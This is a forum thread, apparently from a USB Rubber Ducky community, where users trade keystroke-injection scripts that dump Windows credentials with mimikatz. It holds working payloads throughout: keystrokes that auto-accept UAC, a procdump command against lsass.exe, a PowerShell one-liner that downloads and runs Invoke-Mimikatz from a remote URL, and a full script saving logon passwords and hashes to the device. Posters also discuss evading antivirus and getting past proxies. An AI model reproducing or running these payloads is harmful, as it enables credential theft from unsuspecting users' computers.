[payload] Ducky script using mimikatz to dump passwords from memory

[gentilkiwi]

It seems you don't have UAC ;) otherwise ALT o will valid the UAC prompt ;)

[zardoz]

indeed !! you are right ! on my sandbox machine, i don't have uac enable :D that's why ..

so i erased these lines and the script worked perfeclty.

BUT...

if i use it with UAC enable, i have a problem.

the order "ALT y" is working good manually , yes, but the problem is the UAC pop up is not automatically on front.

sorry for my bad english.

i mean, if i click on the UAC pop-up, and making myself ALT Y, ok , it's working.

but i need to click on the pop-up.

if not, it seems the cmd windows are in front.(i don't know the term in english)

en francais: c'est comme si la fenetre de l'UAC n'etait pas selectionné automatiquement.

du coup, ma commande ALT y ne sert a rien, vu qu'elle agi au niveau de la fenetre "cmd" :(

so the order to say yes i want to authorize on UAC "ALT y" is not understood by the PC.

am i the only one to have this problem ?

is there a command line to select the UAC pop-up, before makiing the ALT y ?

:)

Edited August 26, 2014 by zardoz

[gentilkiwi]

Heureusement je peux facilement te comprendre ;)

Never seen that... but you can try to add :

ALT-TAB
DELAY 500

Before the ALT o / ALT y ;) Not focused or focused, it can't be so bad, no ? let me know ;)

[zardoz]

ok, so i tried to add ADD TAB and ADD-TAB, but it doesnt worked.

i try also SHIFT ALT TAB and SHIFT-ALT-TAB , but it seems these commands are not recognize by the Ducky.

so i changed the way to acces to an admin cmd with the code of shutin:

REM Bypass UAC
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER

and it worked :)

Edited August 28, 2014 by zardoz

[zardoz]

ok, so i tried to add ADD TAB and ADD-TAB, but it doesnt worked.

i try also SHIFT ALT TAB and SHIFT-ALT-TAB , but it seems these commands are not recognize by the Ducky.

so i changed the way to acces to an admin cmd with the code of shutin:

REM Bypass UAC 
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER

and it worked :)

[zardoz]

I've been reading a tutorial about how you can just use the Sysinternals tool Procdump.exe to generate the dmp file like this:

procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp

The beauty here is that procdump will not get flagged by AV like minikatz already is (6/xx on virustotal already) because it's an official microsoft utility! All we need is to have the ducky run procman and put the file on the duck and then we can run minikatz on it later on our own pc. How come everyone always wants the duck to grab things from the internet? We have the capabilty to save files on the ducky so why not use that instead?

any news of that ?

it could be nice ! indeed, mimikatz is great, but it not survive when you plug the ducky on a random machine with AV.

[gentilkiwi]

Of course it works too, but it's much slower ;)

do your own mimikatz version ! (open source)

[MB60893]

I see one serious problem with these scripts, and that is you are effectively downloading Mimikatz to the target machine and executing it. Mimikatz is easily set off by an AV, such as Microsoft Security Essentials. I find that the best way of using Mimikatz is using this powershell script:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" >> %USERPROFILE%\creds.txt
 

This script checks for the correct architecture of the PC's system, then downloads the correct .dll file needed for the execution of Mimikatz. Much cleaner than having to download and store the Mimikatz .exe file.

[BeNe]

This Powershell Script works perfect!

But the most of the clients have a Proxy with authentication active. Is there a way to use the system default proxy settings to get the script running ?

Or to put the powershell Script and needed dll to the SDCard ?

Mimikatz_xy.exe is set off by the AV - the script not.

[ElYpsilon]

Hi, the script dont work on my Ducky...i have flashed the twin ducky Firmware, rename the SD Card to "DUCKY" and copy the code into the decoder....everthing seems fine, but the payload does not run mimikatz...and dont save it to the passwort.txt file on the micro SD card. I use the German keyboard layout and my target machines are only WIN 7 64 bit. At the end of the script, the injected bin will opened by the editor, and then its finish.

Sorry for my extremly bad english...

I use this code:

REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix
REM Description: Dump local wdigest passwords from memory using mimikatz
REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mikikatz from
REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt
REM Target: Windows 7 x64 (target win32 with 32-bit binary)

REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
D

REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500

REM *** Execute mimikatz from SD card and save log file to disk ***
STRING %duck%\mimikatz_alpha_x64.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt
ENTER

REM *** GTFO ***
STRING exit
ENTER
STRING exit
ENTER

To bypass the UAC in German keyboard layout, ALT y is also working like the UK layout?

[ElYpsilon]

Hey...me again...i resolve the problem... i replaced ALT y with TAB TAB TAB...now it works.. ;-)

[BeNe]

If you use a German Keyboard Layout then you should use "ALT j"

(j = ja)

[ElYpsilon]

Yeah you`re right...works!